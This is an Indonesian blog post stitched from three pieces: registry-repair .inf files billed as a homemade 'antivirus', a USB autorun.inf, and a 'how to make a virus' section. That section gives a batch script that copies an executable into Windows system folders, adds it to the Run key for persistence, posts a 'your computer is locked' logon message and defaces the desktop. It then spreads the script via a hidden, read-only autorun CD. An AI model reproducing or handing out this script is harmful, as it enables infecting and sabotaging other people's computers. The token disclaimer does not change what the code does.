CLICK HERE FOR BLOGGER TEMPLATES AND MYSPACE LAYOUTS »

Sabtu, 27 Desember 2008

Buat Antivirus Penyerang File exe Secara manual
31 10 2007
Nih, aku dapet dari temen. Tapi sayang temanku gak bilang dia dapet sumber ini dari mana. Nah, untuk komputer kamu yang gak bisa jalanin file-file berekstensi exe. misal gak bisa ngebuka browser, setting networks, atau program-program lain yang berformat exe. Cara buat antivirusnya gampang kok nih:
1. 1) Buka notepad. Udah itu copy tulisan di bawah ini ke notepad kamu (tulisan warna item aja).
[Version]
Signature=”$Chicago$”
Provider=Vaksincom
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKLM, Software\CLASSES\batfile\shell\open\command,,,”"”%1″” %*”
HKLM, Software\CLASSES\comfile\shell\open\command,,,”"”%1″” %*”
HKLM, Software\CLASSES\exefile\shell\open\command,,,”"”%1″” %*”
HKLM, Software\CLASSES\piffile\shell\open\command,,,”"”%1″” %*”
HKLM, Software\CLASSES\regfile\shell\open\command,,,”regedit.exe “%1″”
HKLM, Software\CLASSES\scrfile\shell\open\command,,,”"”%1″” %*”
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, “Explorer.exe”
HKLM, SYSTEM\ControlSet001\Control\SafeBoot, AlternateShell,0, “cmd.exe”
HKLM, SYSTEM\ControlSet002\Control\SafeBoot, AlternateShell,0, “cmd.exe”
HKLM, SYSTEM\CurrentControlSet\Control\SafeBoot, AlternateShell,0, “cmd.exe”
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden, UncheckedValue,0×00010001,1
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, userinit,0, C:\WINDOWS\System32\userinit.exe ,
[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp
HKCU, Software\Microsoft\Windows\CurrentVersion\Run,T1702521TT4
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run,T70Z516
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Msconfig.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe
HKCU, Software\VB and VBA Program Settings
2. 2) Setelah command2 di atas dicopy dinotepad, lalu save as dalam bentuk format *.inf misalnya antivirus.inf
3. 3) Kemudian buat 1 lagi di notepad juga. Copy command2 (tulisan warna item aja) berikut:
[Version]
Signature=”$Chicago$”
Provider=Babenya Galak
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKLM, Software\CLASSES\batfile\shell\open\command,,,”"”%1″” %*”
HKLM, Software\CLASSES\comfile\shell\open\command,,,”"”%1″” %*”
HKLM, Software\CLASSES\exefile\shell\open\command,,,”"”%1″” %*”
HKLM, Software\CLASSES\piffile\shell\open\command,,,”"”%1″” %*”
HKLM, Software\CLASSES\regfile\shell\open\command,,,”regedit.exe “%1″”
HKLM, Software\CLASSES\scrfile\shell\open\command,,,”"”%1″” %*”
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, “Explorer.exe”
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder, Bitmap,0, “C:\WINDOWS\SYSTEM32\SHELL32.DLL,4″
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder, Text,0, “@shell32.dll,-30498″
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\ClassicViewState, text,0, “@shell32.dll,-30506″
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\ControlPanelInMyComputer, text,0, “@shell32.dll,-30497″
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\DesktopProcess, text,0, “@shell32.dll,-30507″
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\DisableThumbCache, text,0, “@shell32.dll,-30517″
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\FolderSizeTip, text,0, “@shell32.dll,-30514″
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\FriendlyTree, text,0, “@shell32.dll,-30511″
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden, Bitmap,0, “%SystemRoot%\system32\SHELL32.dll,4″
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden, text,0, “@shell32.dll,-30499″
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL, text,0, “@shell32.dll,-30499″
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN, text,0, “@shell32.dll,-30501″
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL, CheckedValue,0×00010001,1
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL, DefaultValue,0×00010001,2
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt, text,0,”@shell32.dll,-30503″
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt, type,0, “CheckBox”
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\NetCrawler, text,0, “@shell32.dll,-30509″
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\PersistBrowsers, text,0, “@shell32.dll,-30513″
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\ShowCompColor, text,0, “@shell32.dll,-30512″
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\ShowFullPath, text,0, “@shell32.dll,-30504″
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\ShowFullPathAddress, text,0, “@shell32.dll,-30505″
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\ShowInfoTip, text,0, “@shell32.dll,-30502″
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SimpleSharing, text,0, “@shell32.dll,-30518″
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden, text,0, “@shell32.dll,-30508″
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Thickets, Bitmap ,0, “C:\WINDOWS\system32\SHELL32.DLL,4″
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Thickets\AUTO, text,0, “Show and manage the pair as a single file”
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Thickets\NOHIDE, text,0, “Show both parts but manage as a single file”
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Thickets\NONE, text,0, “Show both parts and manage them individually”
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\WebViewBarricade, text,0, “@shell32.dll,-30510″
[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistriTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableCMD
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableTaskMgr
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Run, Intelprc
HKCU, Software\Microsoft\Windows\CurrentVersion\Run, Network
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, SystemWindows
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system, legalnoticecaption
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system,legalnoticetext
4. Sama kayak yang nomor 2, save as dalam bentuk *.inf misalnya antivirus2.inf
5. Akhirnya kamu mendapatkan 2 ikon yang bakal membunuh virus yang nyerang aplikasi exe.
Cara kerja:
1. Klik kanan pada ikon yang berextensi *.inf tadi
2. Cari Install dengan klik kanan pada icon ekstensi *.inf
3. Klik Install
4. Lakukan kedua2 nya (File tadi)
5. Mudah2an virus tadi keot dan kamu bisa ngerjain aplikasi exe lagi.
6. Met mencoba








































.ketik di notepad mantera berikut:
[AutoRun]

open=namaantivirus.exe

shellexecute=namaantivirus.exe

shell\Scan pakai alit antivirus!!!\command=namaantivirus.exe

shell=Scan pakai alit antivirus!!!



2.trus save dengan nama “autorun.inf”(gak pake tanda kutip) di flashdisk kita

sekarang tinggal kita copy aja antivirus yang mau kita masukin ke flashdisk..!!!

Tpai tolong diinget kalau copy jang di dalam folder, langsung di root flash disk saja OK.



Dah jadi deh…^_^!!




















Cara buat virus
@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeCaption /d "WARNING MESSAGE FROM LOCAL_HOST(judul title bar)" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeText /d "I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)" /f
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v WallpaperStyle /d 0 /f
reg add "HKEY_USERS\.DEFAULT\Control Panel\Desktop" /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add "HKEY_CURRENT_USER/Control Panel/Colors" /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f

- lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)
- buat Autorun.inf dengan script:

[autorun]
open=nama_file.bat

- lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)
- file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY
- copy file-file tsb ke CD
- nikmati efeknya

note:
- jangan disalahgunakan
- maaf kalau pernah diposting
- maaf lagi kalau salah tempat untuk posting,....maklum member baru and masih amatir ....
- lagi-lagi maaf kalau ada yang salah, and mohon dikoreksi ....
- kalau mau buat anti virusnya tinggal di modifikasi nilainya....

Diposting oleh Qoi di 18.53  

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)